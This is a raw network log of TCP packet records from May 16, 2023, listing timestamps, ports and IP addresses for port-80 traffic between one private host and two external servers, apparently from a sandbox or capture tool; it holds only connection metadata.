May 16, 2023 12:56:34.721889019 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.721893072 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.721911907 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.721913099 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.721935034 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.721942902 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.723078966 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.725660086 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.725692987 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.725711107 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.725730896 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.725749016 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.725760937 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.725769043 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.725790024 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.725792885 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.725809097 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.725811005 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.725824118 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.725827932 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.725847006 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.725852966 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.725866079 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.725869894 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.725888968 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.725891113 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.725899935 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.725922108 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.726198912 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.726730108 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.727199078 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.727402925 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.727425098 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.727474928 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.728305101 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.728329897 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.728349924 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.728368998 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.728387117 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.728405952 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.728410006 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.728430033 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.728430033 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.728439093 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.728475094 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.728493929 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.728513002 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.728518963 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.728533030 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.728534937 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.728549004 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.728844881 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.731169939 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.731199026 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.731220961 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.731239080 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.731240988 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.731257915 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.731261015 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.731276989 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.731287003 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.731295109 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.731306076 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.731327057 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.731328964 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.731347084 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.731349945 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.731365919 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.731368065 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.731388092 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.731388092 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.731404066 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.731420994 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.731426001 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.731441021 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.731458902 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.731460094 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.731475115 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.731478930 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.731488943 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.731498003 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.731518030 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.731535912 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.731549978 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.731785059 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.735373020 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.735421896 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.735441923 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.735460997 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.735465050 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.735482931 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.735486031 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.735491991 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.735506058 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.735519886 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.735534906 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:36.761501074 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:57:42.287790060 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:42.479096889 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:42.479203939 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:42.490221977 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:42.490282059 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:42.680526972 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:42.937711000 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:42.937772036 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:42.937864065 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:42.939054012 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:42.939105988 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:42.939178944 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:42.940604925 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:42.940654993 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:42.940721989 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:42.942037106 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:42.942157030 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:42.942219973 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:42.942246914 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:42.943670034 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:42.943761110 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.128118038 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.128175974 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.128222942 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.128247023 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.128272057 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.128321886 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.129251957 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.129302025 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.129345894 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.129359961 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.129393101 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.129436970 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.130804062 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.130856991 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.130903006 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.130903006 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.130949020 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.130999088 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.132455111 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.132505894 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.132550001 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.132555008 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.132601976 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.132647991 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.133857012 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.133907080 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.133950949 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.133954048 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.133996964 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.134041071 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.165294886 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.319077015 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.319134951 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.319179058 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.319226027 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.319267035 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.319274902 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.319274902 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.319309950 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.319353104 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.319363117 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.319415092 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.319468021 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.320789099 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.320833921 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.320875883 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.320887089 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.320918083 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.320959091 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.320965052 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.321002007 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.321043968 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.321048021 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.321085930 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.321134090 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.321989059 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.322032928 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.322073936 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.322087049 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.322117090 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.322170973 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.322288990 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.322330952 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.322371960 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.322380066 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.322412014 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.322464943 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.322957993 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.323771954 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.323826075 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.323872089 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.323879957 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.323914051 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.323956966 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.323962927 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.323998928 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.324040890 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.324047089 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.324084997 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.324141026 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.325402021 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.325447083 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.325488091 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.325504065 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.325531006 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.325572968 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.325584888 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.325614929 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.325656891 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.325664043 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.325699091 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.325743914 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.346935034 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.509778976 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.509821892 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.509845972 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.509875059 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.509915113 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.509938002 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.509958029 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.509985924 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.509989023 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.510013103 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.510040998 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.510059118 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.510059118 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.510059118 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.510071993 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.510099888 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.510127068 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.510150909 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.510154009 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.510178089 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.510205030 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.510206938 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.511221886 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.511255026 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.511307001 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.511550903 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.511646032 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.513254881 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.513309956 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.513379097 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.513425112 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.513449907 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.513472080 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.513520002 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.513566971 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.513580084 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.513614893 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.513659954 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.513706923 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.513722897 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.513753891 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.513807058 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.513870955 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.513874054 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.513955116 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.514152050 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.514705896 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.514755964 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.514801979 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.514847994 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.514883995 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.514895916 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.514965057 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.515029907 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.515033007 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.515083075 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.516450882 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.516501904 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.516542912 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.516547918 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.516596079 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.516642094 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.516654015 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.516689062 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.516735077 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.516781092 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.516794920 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.537432909 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.537496090 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.537662029 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.665915012 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.700377941 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.700408936 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.700428009 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.700449944 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.700478077 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.700485945 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.700508118 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.700531006 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.700534105 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.700552940 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.700609922 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.856566906 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.856600046 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.856617928 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.856637955 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.856708050 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.856762886 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.856782913 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.856801033 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.856820107 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.856836081 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.856889963 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.856904984 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.856955051 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.856956005 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.856976032 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.857008934 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.857028008 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.857047081 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.857067108 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.857069016 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.857090950 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.857110977 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.857142925 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.857270002 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.857290983 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.857311964 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.857319117 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.857332945 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.857345104 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.857358932 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.857379913 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.857398033 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.857400894 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.857422113 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.857460976 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.857726097 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.857748032 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.857765913 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.857784986 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.857805967 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.859055996 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.859076023 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.859093904 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.859112978 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.859133959 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.859133959 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.859155893 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.859157085 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.859175920 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.859194994 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.859215021 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.859217882 CEST	49172	80	192.168.2.22	23.230.13.96
May 16, 2023 12:57:43.859235048 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.859253883 CEST	80	49172	23.230.13.96	192.168.2.22
May 16, 2023 12:57:43.859272957 CEST	49172	80	192.168.2.22	23.230.13.96
